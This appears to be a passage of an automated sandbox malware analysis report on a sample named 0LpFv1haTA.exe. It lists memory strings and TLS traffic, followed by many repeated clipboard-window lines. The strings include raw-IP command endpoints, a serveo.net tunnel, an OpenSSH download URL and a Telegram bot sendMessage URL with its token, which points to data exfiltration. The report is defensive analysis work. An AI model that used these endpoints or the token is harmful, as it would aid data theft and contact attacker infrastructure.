Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://154.9.207.142:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://185.217.98.121:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://192.99.196.191:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://44.228.161.50:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://46.51.231.213:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://5.196.181.135:443
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F291000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://node.trezor.io
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/product
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
